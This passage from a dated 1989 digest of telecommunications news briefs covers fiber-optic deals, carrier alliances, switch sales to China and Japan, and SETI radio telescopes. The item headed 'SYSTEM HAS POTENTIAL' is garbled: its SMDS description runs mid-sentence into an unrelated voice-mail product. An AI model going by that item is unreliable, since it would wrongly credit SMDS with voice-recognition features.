technology and style," CommunicationsWeek says. Also: The company says they include "sophisticated features" in "small, stylish enclosures." RADIO TELESCOPES LOOK IN SPACE: 112-foot-diameter and 210-foot-diameter radio telescopes in NASA's Deep Space Network will be used in the search for extraterrestrial intelligence in space. Located in the Mojave Desert and Australia, the telescopes will survey the universe over a wide radio frequency range and spot-check bands up to 25,000 megahertz for some signal that indicates intelligence. RADIO WILL SEARCH SILENT VALLEY: NASA's radio network searching for intelligence in space will cover at least 10,000 times more frequencies than all previous surveys and be 300 times more sensitive. The search will hunt for signals from stars similar to Earth's sun, up to 80 light years from Earth. Of particular interest: The region from about 1,000 megahertz to 60,000 megahertz, the silent valley of frequencies. PHONE WILL KEEP HER IN TOUCH: A telephone and computer electronic mail service will keep Abigale K. Alling in touch with the world when she begins a 5-day experiment today in the Arizona desert. She will enter a 20-foot-high, 23-foot-square test module through an air lock and sever the umbilical cord with Earth. She will be cut off from everything except sunlight and communication links with the outside world. ------------------------------------------------------------------------------- March 9, 1989 AT&T MAKES LINK, CHIP FOR JAPAN: AT&T announced 2 products yesterday for Japan: A high-speed, fiber optic data link and an Integrated Services Digital Network (ISDN) microchip. The microchip can work with a variety of microprocessors and other ISDN chips. It will more easily allow Japanese telephone users to have access to a digital network that can provide data, voice, and image transmission on one phone line. LINK WILL HAVE LAN, VIDEO USES: AT&T is developing the ODL 125-FC Lightwave Data Link to comply with Japan's industry standard for fiber-optic connectors, AT&T said yesterday. Comprised of a receiver and transmitter, it converts electrical signals to optical signals for fiber optic data transmission. Applications include fiber-optic, token-passing-ring Local Area Networks, and transmission of digitized video signals. NEW WATS JOINS THE MARKET: Advanced Telecommunications has announced a new long distance service, Standard PLUS WATS, designed for small business customers. Standard PLUS WATS will benefit the business caller whose monthly long distance bill exceeds $150, the company said. Standard PLUS features volume discounts up to 21%, 6-second incremental billing and free call detail. CARRIER GROUP GIVES SUPPORT: The Signaling System 7 from CCITT has won the support of the National Telecommunications Network. SS7 would let NTN provide Integrated Services Digital Network services, calling card services and advanced toll-free services, reports Network World. The 18,000-route mile network has customers in 175 cities. HUGHES OBTAINING NETWORK FIRM: Sytek Inc., a producer of local network equipment, is being bought by Hughes Aircraft for an estimated $50 million, Network World reports. The deal still needs SEC approval. Sytek products include broadband, fiber-optic and twisted-pair versions of Ethernet and token-ring networks. The acquisition has been discussed for months. TULSA METROLINK TO BE BOUGHT: Dallas-based Columbine Telenet has entered an agreement to purchase Tulsa MetroLink from Public Service Co. of Oklahoma, officials said yesterday. Tulsa MetroLink is a 110 mile digital fiber optic communications system founded in 1984 by PSO to provide for high speed data and voice transmission to meet internal communications needs. TULSA FIRM HAS LONGEST FIBER: Tulsa Metrolink, which is being purchased by Columbine Telenet, includes the longest single span of fiber in the USA - 1,944 feet across the Arkansas River. The network can carry more than 400 million bits of data each second and can handle 6,000 simultaneous voice conversations. Laser beams translate data or voice signals into on-off lights sent through glass fibers finer than human hair. CXR LINE TO CROSS INTO KOREA: CXR Telcom, worldwide supplier of systems for the communications markets, has signed a 3-year licensing agreement with Woojin Electronics and Telecommunications Ltd., of Seoul, South Korea. Under the agreement, subject to Korean government approval, Woojin will sell CXR's subscriber line test module to the Korean authority for use in its new line of digital switches. ------------------------------------------------------------------------------- March 10-12, 1989 SPRINT SIGNS ATLANTIC DEAL: Cable & Wireless and US Sprint Thursday announced that US Sprint will acquire the USA end of the PTAT transatlantic fiber-optic cable system. Also: The 2 companies have formed an alliance to jointly develop advanced global telecommunication services. PTAT is the first privately built transatlantic fiber-optic cable. It will link the USA and Britain. (From the USA TODAY Money section.) SPRINT GETS HALF INTEREST: The alliance between US Sprint and Cable & Wireless will be named GLOBAL FON. Also: US Sprint has agreed to acquire the complete interest of the Washington-based Private Transatlantic Telecommunications Systems in the PTAT transatlantic cable system. The acquisition, which is subject to FCC approval, will give US Sprint a 50% interest in PTAT along with Cable and Wireless. NEW SERVICE OFFERS IVPN: Among the first services to be jointly developed by GLOBAL FON by Cable & Wireless and US Sprint will be an international virtual private network (IVPN) based on Sprint's VPN and a GLOBAL FONCARD based on Sprint's travel service, the FONCARD. The alliance will also develop international private line services offering customers a variety of enhanced features and capabilities. ARTEL SYSTEM TO SELL IN JAPAN: NKK Corp., one of Japan's largest industrial concerns with annual revenues of $8 billion, will be licensed to manufacture and sell Artel Communication's 100 Mbps fiber optic local area network system, FiberWay, in Japan, the companies said Thursday. Also: NKK becomes the authorized distributor for Artel's fiber optic video and graphics transmission system products. FLORIDA SITE PLUGGED INTO FIBER: The latest development in fiber optic technology is bringing fiber to the home, Southern Bell says. Heathrow, a mixed use development north of Orlando, Fla., is on the leading edge of fiber-to-the-home efforts. At Heathrow, residents will receive voice, data and video over the same fiber system. The system points to the day when optical fiber will be possible over all telephones. AREA SET FOR VOICE-ONLY FIBER: The first widespread appearance of optical fiber to the home will be traditional voice lines, Southern Bell says. The company will begin using fiber for voice-only delivery later this year in Governor's Island, north of Charlotte, N.C., and several other locations. Studies show that fiber systems to carry voice to the home will be more economical than copper by the early 1990s. FIBER IS GOING SINGLE-MODE: Southern Bell uses fiber systems that operate at up to 1.2 billion digital bits a second on a single fiber (the equivalent of more than 16,000 simultaneous voice conversations), the firm says. Since 1985, most of the optical fiber placed in Southern Bell has been single-mode, which has a thinner core than its multi-mode counterpart, keeping lightwaves traveling in a straight path. CHEVRON CHOOSES TELECOM SUPPLIER: Chevron Information Technology Co. (CITC) has selected Northern Telecom as its sole supplier of telecommunications equipment, company officials said Thursday. The $8.4 million dollar agreement was reached in association with PacTel Meridian Systems, which will provide the equipment and services to Chevron. Most of the PBXs will be located in California, Louisiana and Texas. SOFTWARE PROCESSES AND MONITORS: IBM has introduced 2 products to help customers better manage and use telecommunications facilities. At $90,000, Network Call Accounting can process call detail records from multiple voice switches. Expenses can be charged to a department or an extension. Voice Network Design is a software program that lets customers monitor the cost-effectiveness of transmission facilities. ------------------------------------------------------------------------------- March 15, 1989 SEARS STICKS WITH SPRINT: US Sprint has signed a multi-million dollar communications services agreement with Sears Technology Services Inc., the corporate information organization of Sears, Roebuck and Co. The agreement extends and enhances an agreement previously reached between Sears and US Sprint in 1986 and makes STS one of US Sprint's largest users. 20,000 SEARS SITES COVERED: A new agreement with Sears Technology Services will make US Sprint the primary carrier of interLATA long-distance services for Sears. Specific terms of the contract were not disclosed. However, |officials of both companies said US Sprint would link approximately 20,000 Sears locations throughout the country. Most US Sprint products and services are covered under the agreement. DIGITAL SWITCHES GO TO CHINA: Ericsson has signed a general agreement with China for AXE digital switching equipment expected to lead to contracts worth $31 million in the first stage. The agreement was signed by Ericsson Australia with the Ningbo Post and Telecommunications Bureau and the Ningbo Telephone Co. Ericsson will supply 12 digital AXE switches, including local subscriber and trunk lines, to Ningbo. TELEPHONE AND TERMINAL LINKED: Digital Equipment and Northern Telecom yesterday unveiled new communications capabilities to integrate voice and data information resources at the desk top, linking the telephone and the terminal as a single tool. Featured: When a customer assistance representative answers the phone, pertinent information concerning the caller can be automatically displayed on the terminal. ELECTRICAL PROBLEM FOUND: A potential electrical glitch on the shuttle Discovery poses no danger to the crew but may force it to return a day early. The crew successfully launched a a $100 million Tracking and Data Relay Satellite into orbit Monday. The problem: High pressure in one of 3 fuel cells - used to produce electricity. NASA decides tomorrow when to end the mission. (From the USA TODAY News section.) CALLS MADE ON THE COMPUTER: An integrated message desk capability that automatically links message taking to electronic mail or voice store and forward mail is included in a new communications system from Digital Equipment and Northern Telecom. Also included: Computer screen dialing that enables a user to key in the name of the party to be called. It can be used for office communications, telemarketing and other calls. BELLATRIX JOINS THE FIELD: Bellatrix Corp., a publicly owned company, said yesterday it will enter the field of telecommunications through its wholly owned subsidiary, Bellatrix Communications Inc. It will offer turnkey 900 interactive data and information services, including connection and termination. Bellatrix expects the services to be operational in May. CHINA GETS 8,000 NEW LINES: Northern Telecom put into service yesterday its first DMS-100 digital switching system in the People's Republic of China. The system will provide 8,000 lines of telecommunications service to 3 cities in Jiangxi province, about 900 miles south of Beijing. Features such as direct dial services will now be available to local subscribers. LARGEST SYSTEM SERVES PINGXIANG: The main Northern Telecom system that opened yesterday in China consists of 6,000 telephone lines for subscribers in Pingxiang. The Pingxiang system is part of a $6 million contract announced in 1987 through which Northern Telecom will supply its DMS-100 and DMS-10, with a capacity of 10,000 lines, to the Jiangxi PTA for telecommunications services in 4 Chinese cities. PACTEL HEAD MADE A DIRECTOR: Sam Ginn, chairman and chief executive officer of Pacific Telesis Group, has been elected a director of Transamerica Corp., it was announced yesterday. Ginn, 51, has been chairman and chief executive officer of Pacific Telesis since April 1988. Previously he held the position of president and chief operating officer. Ginn began his business career in 1960 with AT&T. ------------------------------------------------------------------------------- March 17-19, 1989 YELLOW PAGES ARE FOR NIGHT OWLS: Pacific Bell assembled a separate yellow page section of businesses open after 6 p.m. The first one, due out this month in San Jose, Calif., has 199 listings - everything from 24-hour salons to an all-night notary public. Officials say this is a first-of-its-kind listing to be included in telephone books in 29 California communities by May 1990. ------------------------------------------------------------------------------- March 21, 1989 CORDLESS PHONES CALL POLICE: Some Cleveland, Ohio, residents with cordless phones are alarmed to find police at their doors asking, "What's the problem?" The problem: Cordless phones with weak batteries send out pulses that sometimes automatically dial the emergency number 911. (From the USA TODAY News section.) ALLTEL CLAIMS STAKE IN CELLULAR: ALLTEL Mobile Communications said yesterday that it has completed its purchase of Kansas Cellular Telephone Co.'s 40% interest in the Wichita, Kan., wireline cellular system. ALLTEL Mobile will be a limited partner in the Wichita SMSA partnership. Southwestern Bell Mobile Systems is the general partner and operator of the system. DIGITAL SYSTEM GOES VIA SW BELL: Southwestern Bell Telecom will distribute Northern Telecom's Meridian Norstar digital key system, company officials announced yesterday. Southwestern Bell Telecom will market the Meridian Norstar in Missouri, Kansas, Oklahoma, Arkansas and Texas. Meridian Norstar is a small business communications system which offers voice and data communications capabilities. GTE AWARDS RADIO CONTRACT: Ericsson Radar Electronics of Sweden has received a $55 million contract from GTE Government Systems Corp. to deliver mobile microwave radios to the corporation's Mobile Subscriber Equipment Division in Taunton, Mass. Designated MF15, the 15 GHz down-the-hill radios have a transmission capacity of 256 - 4096 kbit/s. They were developed by Ericsson and Marconi Italiana. EXCHANGE TO CARRY ISDN CIRCUIT: Network Equipment Technologies Inc. said yesterday that its Integrated Digital Network Exchange has become the first product of its kind to be certified to carry an ISDN primary rate circuit (23B plus D) between 2 Northern Telecom Meridian SL-1 private branch exchanges. The announcement came after successful testing conducted recently by Northern Telecom at its facility in Santa Clara, Calif. COMSAT TO DEVELOP NETWORK: COMSAT Corp.'s Systems Division has been awarded a $16.9 million contract by the Turkish Postal Telephone and Telegraph agency to modernize U.S. military communications in the Mediterranean area. Designed and funded by the U.S. Defense Communications Agency, the 5-year program calls for COMSAT to perform systems engineering and integration for a new digital wideband satellite-based network. SYSTEM TO REPLACE TURKEY SITES: A new COMSAT system known as "DMIP I" (DCA Mediterranean Improvement Program Phase I) is the first of a series designed to improve Mediterranean area U.S. military communications over the next several years. Each of DMIP I's 6 Earth stations, located at major U.S. defense installations throughout Turkey, will eventually replace the antiquated troposcatter sites. RURAL WISCONSIN WILL GET TDS: Telephone and Data Systems Inc. says that as a result of FCC lotteries held this week it expects to have an interest in cellular systems serving 2 Rural Service Areas in Wisconsin. The systems will serve southwestern and central Wisconsin and the major state highways to the west and southwest of Madison, Wis. FIBER OPTICS HAVE MILITARY USE: The Communications Product Division of Microwave Modules and Devices and Codenoll Technology have announced an agreement to offer rugged and militarized versions of Codenoll's fiber optic Ethernet Local Area Network products for military/federal Tempest applications. It gives the firms rights to use and modify Codenoll's designs according to military standards. ------------------------------------------------------------------------------- March 31-April 2, 1989 LINES ARE PICTURE PERFECT: Telephone lines are being used to send images from electronic still cameras to newspapers and companies. The camera captures images on a tiny computer disk instead of film. A transmitter sends the image over phone lines in 3 1/2 minutes or less. Once received, the image can be stored on a disk or printed on paper. (From the USA TODAY Money section.) FRENCH LINE GOES SILENT: In operation only 3 months, the TAT-8 trans-Atlantic fiber optic system reaching into France needed to be closed down last week for repairs. Suspected cause: Trawling lines in the Atlantic. During the restoration, the International Telecommunications Satellite Organization carries the international traffic. TAT-8 is owned by AT&T, France Telecom and British Telecom. NYNEX SUPPORTS HIGH-SPEED DATA: NYNEX said Thursday that it supports proposed generic requirements for a new high-speed data communications service. Known as Switched Multimegabit Data Service, the system is scheduled to be available as early as 1991. SMDS will interconnect local area networks (LANs) by providing broadband transport across a metropolitan area using public, packet-switched networks. SYSTEM HAS POTENTIAL: Designed to make use of evolving metropolitan-area network standards and technology, the new Switched Multimegabit Data Service will provide customer voice commands or touchtone signals. When a user calls the TeleCenter, he or she is prompted to give a name and password. A voice entry feature searches its "user profile" records for a voice pattern matching that of the caller. If the caller is identified as an authorized user, the caller's stored templates are loaded, allowing the user to communicate with the voice mail system entirely by voice. ------------------------------------------------------------------------------- .